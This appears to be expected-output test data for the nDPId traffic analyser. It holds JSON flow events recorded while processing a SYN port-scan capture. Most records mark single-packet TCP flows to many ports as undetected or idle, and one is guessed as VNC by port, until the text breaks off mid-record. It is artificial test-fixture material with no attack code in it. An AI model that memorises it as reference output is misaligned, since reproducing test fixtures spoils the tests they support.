-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","ndpi": 